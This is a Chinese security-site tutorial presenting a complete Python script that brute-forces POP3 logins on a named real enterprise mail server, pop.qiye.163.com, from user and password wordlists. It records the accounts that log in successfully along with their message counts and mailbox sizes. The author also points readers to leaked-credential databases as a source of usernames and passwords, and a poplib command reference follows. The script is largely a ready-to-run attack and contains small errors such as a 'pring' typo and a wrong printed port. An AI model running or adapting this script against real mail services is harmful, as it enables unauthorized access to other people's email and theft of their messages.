设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:SecYe > 网络编程 > Python > 正文

python制作企业邮箱的爆破脚本

时间:2016-10-20 11:46 来源:未知 作者:SecYe安全 阅读:

按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破的脚本。

我先说下整体思路:

总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息.

1.首先验证参数是否正确

Sys.argv[]是用来获取命令行参数的,sys.argv[0]表示代码本身文件路径,所以参数从1开始

 

2.然后从用户密码文件中读取信息

3.pop.getwelcome()用来获取连接服务器的响应状态

4.然后就是脚本的核心代码部分

server = "pop.qiye.163.com" //设置pop3服务器地址

pop = poplib.POP3(server,110) //连接pop3服务器

pop.user(user) //验证用户名

auth = pop.pass_(passwd) //验证密码

if auth.split(' ')[0]== "+OK": //判断响应的结果是否“OK”

pring user,passwd

 

5.最后输出出来相关的用户信息

脚本代码如下:

#!/usr/bin/python

# -*- coding: UTF-8 -*-

'''

@Author:joy_nick

@博客:http://byd.dropsec.xyz/

@Email Pop3 Brute Forcer

'''

 

import threading, time, random, sys, poplib

from copy import copy

 

if len(sys.argv) !=3:

print "\t --------------------------------------------------\n"

print "\t Usage: ./Emailpopbrute.py \n"

sys.exit(1)

 

server = "pop.qiye.163.com"

success = []

 

try:

users = open(sys.argv[1], "r").readlines()

except(IOError):

print "[-] Error: urerlist打开失败!\n"

sys.exit(1)

 

try:

words = open(sys.argv[2], "r").readlines()

except(IOError):

print "[-] Error: passlist打开失败!\n"

sys.exit(1)

try:

pop = poplib.POP3(server,110)

welcome = pop.getwelcome()

print welcome

pop.quit()

except (poplib.error_proto):

welcome = "No Response"

pass

 

def mailbruteforce(listuser,listpwd):

if len(listuser) < 1 or len(listpwd) < 1 :

print "An error occurred: No user or pass list"

return 1

for user in listuser:

for value in listpwd :

user = user.replace("\n","")

value = value.replace("\n","")

try:

print "-"*12

print "[+] User:",user,"Password:",value

time.sleep(1)

pop = poplib.POP3(server,110)

pop.user(user)

auth = pop.pass_(value)

print auth

if auth.split(' ')[0]!= "+OK" :

pop.quit()

print "unknown error !"

continue

if pop.stat()[1] is None or pop.stat()[1] < 1 :

pop.quit()

print "获取信息失败!"

continue

ret = (user,value,pop.stat()[0],pop.stat()[1])

success.append(ret)

pop.quit()

break

except:

#print "An error occurred:", msg

pass

print "\t --------------------------------------------------\n"

print "[+] Server:",server

print "[+] Port: 995"

print "[+] Users Loaded:",len(users)

print "[+] Words Loaded:",len(words)

print "[+] Server response:",welcome,"\n"

mailbruteforce(users,words)

 

print "\t[+] have weakpass :\t",len(success)

if len(success) >=1:

for ret in success:

print "\n\n[+] Login successful:",ret[0], ret[1]

print "\t[+] Mail:",ret[2],"emails"

print "\t[+] Size:",ret[3],"bytes\n"

print "\n[-] Done"

 

 

 

测试结果:

 

说明:

用户字典文件需要@domain.com,类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样的。由于我也没有企业邮箱的账号密码,也就没测试成功的,要是感兴趣,可以搜一下相关社工裤。

附:

python 中 os._exit(), sys.exit(), exit() 的区别是什么?

sys.exit(n) 退出程序引发一个SystemExit异常, 可以捕获异常执行些清理工作. n默认值为0, 表示正常退出. 其他都是非正常退出. 没有捕获这个异常,会直接退出;捕获这个异常可以做一些额外的清理工作。 一般主程序中使用此退出

os._exit(n), 直接退出 Python 解释器,其后的代码都不执行, 不抛异常, 不执行相关清理工作. 常用在子进程的退出.

exit() 跟 C 语言等其他语言的 exit() 应该是一样的

 

pop3收取邮件的过程一般是:

连接pop3服务器 (poplib.POP3.__init__)

发送用户名和密码进行验证 (poplib.POP3.user poplib.POP3.pass_)

获取邮箱中信件信息 (poplib.POP3.stat)

收取邮件 (poplib.POP3.retr)

删除邮件 (poplib.POP3.dele)

退出 (poplib.POP3.quit)

 

命令 poplib方法 参数 状态 描述

-----------------------------------------------------------------------------------------------

USER user username 认可 用户名,此命令与下面的pass命令若成功,将导致状态转换

PASS pass_ password 认可 用户密码

APOP apop Name,Digest 认可 Digest是MD5消息摘要

-----------------------------------------------------------------------------------------------

STAT stat None 处理 请求服务器发回关于邮箱的统计资料,如邮件总数和总字节数

UIDL uidl [Msg#] 处理 返回邮件的唯一标识符,POP3会话的每个标识符都将是唯一的

LIST list [Msg#] 处理 返回邮件数量和每个邮件的大小

RETR retr [Msg#] 处理 返回由参数标识的邮件的全部文本

DELE dele [Msg#] 处理 服务器将由参数标识的邮件标记为删除,由quit命令执行

RSET rset None 处理 服务器将重置所有标记为删除的邮件,用于撤消DELE命令

TOP top [Msg#] 处理 服务器将返回由参数标识的邮件前n行内容,n必须是正整数

NOOP noop None 处理 服务器返回一个肯定的响应

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%